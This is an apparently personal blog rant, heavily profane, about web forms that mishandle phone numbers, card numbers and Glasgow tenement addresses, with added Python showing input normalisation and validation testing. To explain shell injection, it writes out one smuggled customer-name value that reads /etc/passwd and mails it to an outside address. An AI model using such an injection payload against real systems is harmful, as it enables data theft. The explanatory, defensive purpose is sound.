Fucking web developers!

A reminder of the eternal validity of Sturgeon's Law.


Phone number, motherfucker! Do you speak it?

There’s nothing that pisses me off quite so easily and frequently as an encounter with a web site that gets in my way because whoever wrote it didn’t think. (Or was too lazy or ignorant to care; the results are the same.)

Here I am, filling out my address details, and the web site repeatedly gets in my way. It asks me for my home phone number, so I type in 0141 339 xxxx. Or rather I try to, and then run out of room, because the genius who wrote the form thought “UK phone numbers are 12 digits, so I’ll make the form field 12 characters long”, which a) is wrong (they’re 10 or 11 digits long, assuming you don’t have to mess around with extensions), and b) is amazingly unhelpful, given that phone numbers are usually written down with spaces, and that’s how people think of them.

Perhaps there’s a reason why my credit card company has tried to make it easy for me to read my credit card number?

Stupid web designers do this with credit cards as well, and it drives me up the wall. You get out your credit card, which is typically displayed as 6759 0123 4567 8901 for convenience, so that’s how you type it in. And you get to the 8, with three digits left to type, and you realise you’ve run out of room, because the web designer thought “credit cards are 16 digits long” so only gave you space for 16 digits. Never mind that some credit cards are perfectly legitimately 19 digits long. What’s even worse is when the form gives you enough space to type a credit card with spaces in it, but if you have the nerve to do that the form complains that you’ve entered an incorrect credit card number.

For fuck’s sake, how hard is it to strip spaces from a sodding 20-odd digits text field? You should be coping with the stuff people type in rather than lecturing them on how your internal structures work. Telephone numbers in the UK consist of an area code, a space, and then one or two sets of digits, depending on how large the area is and therefore how many digits you need to give everyone a phone number. They’re printed that way, and people think of them that way. Don’t erect annoyance barriers just because you’re too lazy or incompetent to deal with one of the simplest tasks any programming language has to deal with.

Similarly, credit card numbers are divided into 3-, 4- or 6-digit chunks so you don’t have to keep the entire number in your head (which you can’t do because they’re at least 13 digits long and the brain can’t handle more than about 7±2). Which is bloody useful if you’re reading a card number to someone over the phone, or you’re looking at your card, then switching to looking at your keyboard or your screen while you type; you only have to worry about the particular group of 3-6 digits you’re telling someone, or typing.
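What "coping with the stuff people type in" looks like on the server, as an added example that is not part of the original post: strip the grouping separators first, then validate what is left. The function names and sample inputs are constructed, and the Luhn checksum is an addition the post does not mention.

```python
import re

def canonical_digits(raw: str) -> str:
    """Drop the spaces and hyphens people type between digit groups."""
    digits = re.sub(r"[\s\-]", "", raw)
    if not re.fullmatch(r"[0-9]+", digits):
        raise ValueError("only digits, spaces and hyphens are expected")
    return digits

def luhn_ok(digits: str) -> bool:
    """Luhn checksum (an addition here; the post does not mention it)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # double every second digit, counting from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def parse_card_number(raw: str) -> str:
    digits = canonical_digits(raw)
    if not 13 <= len(digits) <= 19:  # lengths given in the post
        raise ValueError("card numbers are 13 to 19 digits long")
    if not luhn_ok(digits):
        raise ValueError("checksum failed; probably a typo")
    return digits

def parse_uk_phone(raw: str) -> str:
    digits = canonical_digits(raw)
    if len(digits) not in (10, 11):  # lengths given in the post
        raise ValueError("UK numbers are 10 or 11 digits long")
    return digits

if __name__ == "__main__":
    # Constructed sample inputs, typed the way they are printed.
    print(parse_card_number("4111 1111 1111 1111"))
    print(parse_uk_phone("0141 496 0123"))
```
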

Cargo-cult developers all live in houses or main-door flats, apparently

But this isn’t the worst sin. I can, after all, enter my credit card number without spaces and it will eventually work. Abbey National’s website goes one better by refusing to acknowledge my address in any shape or form.

I live in Glasgow, in a tenement flat, and as such my address looks like “2/2 23 Street Name, Glasgow G12 nXX”. I’m betting none of the people who wrote the website’s data validation code live at such an address, because if I try and enter my address, the website complains that it’s incorrect. The worst thing is, I’m almost certain I know why they’re saying this: because they think that slashes (‘/’) are inherently evil.

Now, to be sure, there is a danger in blithely trusting anything you’re given. Suppose someone’s signing up for your latest online thingy, and you want to make sure they’re not already a customer of your old creaky legacy system because otherwise the sales guys will go through your customer database and get huge commissions but the company doesn’t actually gain new customers. So you’ve got a customer name, let’s call it $cust_name because that’s how programmers talk, and you decide to run the system command check_customer --name "$cust_name". That works fine until a malicious attacker guesses that you’re doing something like this, and through trial and error comes up with the baroque customer name John Smith"; cat /etc/passwd | mail l33th4xx0rdud3@gmail.com; " and suddenly you’ve found your program tricked into emailing the contents of your list of users to someone who almost certainly is up to no good.

(Yes, yes, these days /etc/passwd is pretty much useless to an attacker, but it’s the standard example, and it’s more readable than the almost line-noise involved in installing a root-kit on a machine.)
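The failure described above next to its fix, as an added example that is not code from the original post. `echo` stands in for the post's `check_customer` command, the function names are hypothetical, and the hostile name is constructed with a harmless payload.

```python
import subprocess

def check_customer_unsafe(cust_name: str) -> str:
    # The "before": the name is pasted into a shell command line, so a
    # double quote inside it ends the argument and the rest runs as shell.
    # `echo` is a stand-in for check_customer (assumption).
    cmd = f'echo --name "{cust_name}"'
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout

def check_customer_safe(cust_name: str) -> str:
    # The fix: pass an argument vector and involve no shell at all.
    # The name stays a single argument whatever characters it contains.
    argv = ["echo", "--name", cust_name]
    result = subprocess.run(argv, capture_output=True, text=True)
    return result.stdout

# Constructed inputs: one shaped like the post's hostile name, one
# perfectly ordinary Glasgow tenement address line.
HOSTILE = 'John Smith"; echo INJECTED; "'
TENEMENT = "2/2 23 Street Name"

if __name__ == "__main__":
    print("unsafe:", check_customer_unsafe(HOSTILE).splitlines())
    print("safe:  ", check_customer_safe(HOSTILE).splitlines())
    print("safe:  ", check_customer_safe(TENEMENT).splitlines())
```

With the argument-vector form there is nothing left for a slash or a quote to break, so neither needs banning from the form.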

Cross-site scripting (called XSS so as not to conflict with Cascading Style Sheets) and SQL injection (e.g. this notorious xkcd webcomic) are pretty much the same thing: if you’re going to take something someone typed on the Internet and assume that it won’t cause problems, eventually you’re going to find yourself dead wrong and in a load of trouble.

The problem is, whoever wrote the web form at Abbey National had clearly heard of the idea of validating user input and making sure you weren’t tricked into compromising the security of your systems; but, in true cargo-cult fashion, only dimly understood the problem, and learned the wrong lessons. What they should have learned was “don’t trust the user, and make sure that anything you pass to an external process is properly sanitised before use”. What they learned instead, though, was: “anyone using slashes is trying to hack the webserver”.

Maybe I should test my code before inflicting it on the poor, unsuspecting world?

But blithely assuming that slashes are evil isn’t the worst sin either. I mean, I can just say that I live in 23 Street Name rather than 2/2 23 Street Name, and assuming my postman isn’t a complete cretin I’ll still get any post you decide to send me. I told a number of French companies that I lived at 23 rather than 2/2 23, mostly because I couldn’t remember what the French was for ‘slash’, and it gets to me.

No, what lifts this particular failure into stratospheric “OMGWTFBBQ you did what now?” territory is that the same company that decides that I can’t have a slash in my address also has a complete copy of the UK postcode database. And, guess what, the UK postcode database is chock-full of addresses that contain slashes. So the solution to your problem isn’t to have some bolshy Glasgow resident on your team who tells you to stop being so fucking stupid about slashes, or who knows that Edinburgh tenement addresses tend to be e.g. ‘2f1 25 Street Name’ (there are plenty of web sites that don’t accept that either). The solution is to test your data validation code against addresses that you know for a fact to be valid, because you paid good money to the UK Government to get a complete list of them.

There are many popular software development mantras, most of which are either transparent bullshit or promoted by over-zealous aficionados as some sort of universal salvation rather than a pragmatic approach to doing your fucking job. But sometimes a startlingly good idea can emerge from all the nonsense, like, for instance, the idea that if you’re writing code to make sure that your inputs are sane, and you’ve got a metric fuckton of valid data, maybe you should set loose one against the other.

So this is really the worst sin of all: someone wrote a website that took customers’ address details, blithely decided that some things just Weren’t Allowed because of poorly-understood ideas about security, and didn’t test their code against a huge list of valid addresses that they already had.
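Setting one loose against the other, as an added example that is not part of the original post: run the validator over addresses known to be valid and list what it wrongly rejects. The four-line corpus is constructed and stands in for the postcode database; the strict rule is the character set quoted in the PS below, and the function names are hypothetical.

```python
import re
from collections import Counter

# Constructed sample; a real run would read every address line from the
# licensed postcode file instead.
KNOWN_VALID = [
    "2/2 23 Street Name",
    "2f1 25 Street Name",
    "23 Street Name",
    "Flat 4, 10 St. Andrew's Road",
]

# Character rule from the error message in the PS:
# A-Z, a-z, 0-9, space, apostrophe, hyphen.
ALLOWED = r"A-Za-z0-9 '\-"

def allowlist_validator(line: str) -> bool:
    return re.fullmatch(f"[{ALLOWED}]+", line) is not None

def printable_validator(line: str) -> bool:
    # Alternative rule: any printable text of sane length. Control
    # characters and newlines are still refused.
    return 0 < len(line.strip()) <= 100 and line.isprintable()

def false_rejections(validator, corpus):
    """Known-valid lines the validator refuses; should be empty."""
    return [line for line in corpus if not validator(line)]

def offending_characters(corpus):
    """How many known-valid lines each disallowed character appears in."""
    counts = Counter()
    for line in corpus:
        counts.update(set(re.sub(f"[{ALLOWED}]", "", line)))
    return counts

if __name__ == "__main__":
    print("strict rule rejects:", false_rejections(allowlist_validator, KNOWN_VALID))
    print("characters to blame:", dict(offending_characters(KNOWN_VALID)))
    print("printable rule rejects:", false_rejections(printable_validator, KNOWN_VALID))
```

Run as a build-time test, a non-empty rejection list fails the release before a customer ever sees the form.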

About that sub-heading

Sturgeon’s Law, in its simplest form, goes like this: “90% of all science fiction is crud; but then, 90% of everything is crud”. It explains why whenever I say “I write the dynamic parts of websites that let you buy stuff online”, I have to say, because of the incompetent mouth-breathing fucktards who wrote Abbey National’s website, “but I’m not like those morons”.

Needless to say, Abbey National aren’t getting my business.

PS: Motherfuckers!

Lloyds TSB sprung the same goddamn thing on me, except that I entered my post code, chose my address from the list, and then they complained that information submitted to their form from the goddamn UK postcode database was invalid.

Please check your entry for this address line, you’ve entered a character that is not allowed in this box. You can type in (A-Z), (a-z), (0-9), space, apostrophe (‘), hyphen (-).

Now, I’m aware that many people think that Glasgow is a terrifying shithole, but surely that’s not a reason for arbitrarily fucking over people who live in the far more refined and salubrious neighbourhood of G12?
